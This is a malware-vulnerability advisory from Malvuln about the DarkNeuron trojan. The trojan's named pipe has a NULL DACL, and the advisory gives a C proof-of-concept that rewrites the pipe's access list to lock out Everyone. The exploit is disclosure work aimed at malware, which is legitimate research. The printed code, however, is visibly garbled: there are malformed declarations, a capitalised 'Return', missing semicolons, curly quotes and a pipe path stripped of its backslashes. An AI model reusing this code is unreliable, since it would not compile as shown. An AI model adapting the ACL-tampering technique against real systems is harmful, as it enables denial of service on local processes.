Trojan.Win32.DarkNeuron.gen MVID-2022-0661 Named Pipe NULL DACL

Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txt

Contact: [email protected]

Media: twitter.com/malvuln

Backup media: infosec.exchange/@malvuln

Threat: Trojan.Win32.DarkNeuron.gen

Vulnerability: Named Pipe Null DACL

Family: DarkNeuron (Turla Group)

Type: PE32

MD5: d891c9374ccb2a4cae2274170e8644d8

Vuln ID: MVID-2022 – 0661

Disclosure: 11/24/2022

Description: A malware process called “NCSC.exe”, creates an IPC pipeline with a NULL DCAL, allowing for RW by the Everyone user group.

.PipeWinsock2baseapi_http

RW Everyone

RW BUILTINAdministrators

Modifying the DACL can be done by low-privileged local users to deny access for Everyone.

Exploit/PoC:

#include “windows.h”

#include “stdio.h”

#include “accctrl.h”

#include “aclapi.h”

/*

Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exe

MD5: d891c9374ccb2a4cae2274170e8644d8

NamedPipe Deny Everyone Access

Malvuln

November 2022

**/

#define VULN_TROJAN_PIPE “.pipeWinsock2baseapi_http”

int main(void){

HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL);

PACL = pOldDACL NULL

PACL = null;

if (hPipe == INVALID_HANDLE_VALUE){

printf(“%d”, GetLastError());

Return 1

}

if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){

printf(“%d”, GetLastError());

Return 1

}

TRUSTEE trustee[1];

trustee[0].TrusteeForm = TRUSTEE_IS_NAME;

trustee[0].TrusteeType = TRUSTEE_IS_GROUP;

trustee[0].ptstrName = TEXT(“Everyone”);

trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;

trustee[0].pMultipleTrustee = NULL;

EXPLICIT_ACCESS explicit_access_list[1];

ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));

explicit_access_list[0].grfAccessMode = DENY_ACCESS;

explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;

explicit_access_list[0].grfInheritance = NO_INHERITANCE;

explicit_access_list[0].Trustee = trustee[0];

if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){

printf(“%d”, GetLastError());

Return 1

}

if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){

printf(“%d”, GetLastError());

Return 1

}else{

printf(“Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!n”);

printf(“By Malvulnn”);

printf (“Nov 2022n”)

}

LocalFree(pNewDACL);

LocalFree(pOldDACL);

CloseHandle(hPipe);

system(“pause”);

Return 0

}

Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible for misuse or misappropriation of information and does not accept responsibility for damages resulting from the misuse. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.comTM